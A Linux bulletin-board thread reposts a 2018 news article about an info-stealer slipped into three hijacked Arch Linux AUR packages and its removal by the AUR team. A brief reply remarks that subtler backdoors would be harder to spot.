Rocksolid Light

Welcome to novaBBS (click a section below)

mail  files  register  nodelist  faq  login

"You are WRONG, you ol' brass-breasted fascist poop!" -- Bloom County


rocksolid / Linux / Re: Malware Found in Arch Linux AUR Package Repository

SubjectAuthor
* Malware Found in Arch Linux AUR Package RepositoryAnonymous
`- Re: Malware Found in Arch Linux AUR Package Repositoryanon

1
Subject: Malware Found in Arch Linux AUR Package Repository
From: Anonymous
Newsgroups: rocksolid.shared.linux
Organization: RetroBBS II
Date: Thu, 12 Jul 2018 10:03 UTC
Path: rocksolid2!.POSTED.localhost!not-for-mail
From: retrob...@retrobbs.rocksolidbbs.com (Anonymous)
Newsgroups: rocksolid.shared.linux
Subject: Malware Found in Arch Linux AUR Package Repository
Date: Thu, 12 Jul 2018 10:03:06 +0000
Organization: RetroBBS II
Lines: 36
Message-ID: <pi790q$dqe$1@novabbs.com>
Reply-To: Anonymous <retrobbs2@retrobbs.rocksolidbbs.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Thu, 12 Jul 2018 10:03:06 -0000 (UTC)
Injection-Info: novabbs.com; posting-host="localhost:127.0.0.1";
logging-data="14158"; mail-complaints-to="usenet@novabbs.com"
User-Agent: FUDforum 3.0.7
X-FUDforum: d41d8cd98f00b204e9800998ecf8427e <380803>
View all headers
 By Catalin Cimpanu

    July 10, 2018 05:26 PM Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages.

The malicious code has been removed thanks to the quick intervention of the AUR team.
Info-stealer found in "acroread" Arch Linux package

The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors.

On Saturday, a user going by the pseudonym of "xeactor" took over one such orphaned package named "acroread" that allows Arch Linux users to view PDF files.

According to a Git commit to the package's source code, xeactor added malicious code that would download a file named "~x" from ptpb.pw, a lightweight site mimicking Pastebin that allows users to share small pieces of texts.

When the user would install the xeactor package, the user's PC would download and execute the ~x file [VirusTotal, source code], which would later download and run another file named "~u" [VirusTotal, source code].

Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd and add a timer to run the ~u file at every 360 seconds.
Malware didn't do much

The purpose of the second file (~u) was to collect data about each infected system and post these details inside a new Pastebin file, using the attacker's custom Pastebin API key.

Collected data includes details such as the date and time, machine's ID, CPU information, Pacman (package manager) details, and the outputs of the "uname -a" and "systemctl list-units" commands.

No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

There isn't a self-update mechanism included, meaning xeactor would have needed a second acroread package update to deploy more intrusive code, or potentially another malware strain.
Two other yet-to-be-named packages also found infected

The AUR team also said it found similar code in two other packages that the xeactor user had recently taken over. The following packages and versions were known to be affected:
acroread 9.5.5-8
balz 1.20-3
minergate 8.1-2

All malicious changes to all three packages have now been reversed, and xeactor's account has been suspended. The AUR repository should not be confused with official pacakges in the Arch Build System (ABS). AUR packages are user generated and submitted to the repository, while ABS packages are official packages from trusted sources. The Arch Linux team has warned users for years about verifying each AUR package before installing it.

The Arch Linux team is the second Linux distro that has found malware on its user-submitted package repository this year. In May, the Ubuntu Store team found a cryptocurrency miner hidden in an Ubuntu package named 2048buntu.
Posted on RetroBBS II


Subject: Re: Malware Found in Arch Linux AUR Package Repository
From: anon
Newsgroups: rocksolid.shared.linux
Organization: def4
Date: Thu, 12 Jul 2018 11:18 UTC
References: 1
Path: rocksolid2!def3!.POSTED.localhost!not-for-mail
From: ano...@anon.com (anon)
Newsgroups: rocksolid.shared.linux
Message-ID: <6ea70f02e2ad501311c5a24f9bafed55@def4.com>
Subject: Re: Malware Found in Arch Linux AUR Package Repository
Date: Thu, 12 Jul 2018 11:18:06+0000
Organization: def4
In-Reply-To: <pi790q$dqe$1@novabbs.com>
References: <pi790q$dqe$1@novabbs.com>
Lines:
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
View all headers
The Arch Linux team is the second Linux distro that has found >malware on its user-submitted package repository this year. In >May, the Ubuntu Store team found a cryptocurrency miner hidden >in an Ubuntu package named 2048buntu.

and that is only the obvious stuff...a carefully constructed buffer overflow would be much more difficult to spot, and finally could be used for the same purpose...

Posted on def4.i2p


1
rocksolid light 0.7.0
clearneti2ptor